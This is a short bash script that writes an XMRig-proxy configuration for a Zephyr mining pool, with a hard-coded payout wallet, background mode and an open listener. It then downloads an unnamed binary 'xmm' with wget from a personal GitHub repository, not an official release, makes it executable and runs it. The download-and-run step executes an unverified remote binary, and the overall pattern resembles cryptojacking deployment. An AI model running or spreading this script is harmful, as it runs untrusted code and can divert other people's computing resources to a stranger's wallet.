#!/bin/bash

# Set Xmrig proxy configuration
cat <<EOF > config.json
{
  "log-file": null,
  "merge-multi-ssl": false,
  "access-log-file": false,
  "access-password": null,
  "algo-ext": true,
  "api": {
    "id": null,
    "worker-id": null
  },
  "http": {
    "enabled": false
  },
  "background": true,
  "bind": [
    {
      "host": "0.0.0.0",
      "port": 3333,
      "tls": true
    }
  ],
  "colors": false,
  "custom-diff": 0,
  "donate-level": 0,
  "log-file": null,
  "mode": "nicehash",
  "pools": [
    {
      "algo": "rx/0",
      "coin": null,
      "url": "zephyr.herominers.com:1124",
      "user": "ZEPHYR3WLwbe4Nc9NgSMm1ZFcoZgLBLmqRnDqqRTYgjviBYvJ4GQjSQAwAGASA5CfwbS1AFXCGjmtXHTSBAER2fRjNbEnQGTBDD1X",
      "pass": "x",
      "keepalive": true,
      "enabled": true,
      "tls": true,
      "daemon": false
    }
  ],
  "retries": 29999,
  "retry-pause": 5,
  "reuse-timeout": 10,
  "tls": {
    "enabled": true,
    "protocols": null,
    "cert": null,
    "cert_key": null,
    "ciphers": null,
    "ciphersuites": null,
    "dhparam": null
  },
  "user-agent": null,
  "syslog": false,
  "verbose": false,
  "watch": false,
  "workers": true
}
EOF

# Download Xmrig proxy release
wget https://github.com/max313iq/Ssl/releases/download/Xxx/xmm
chmod +x xmm

# Run Xmrig proxy 
./xmm -c config.json logfile.log 2>&1
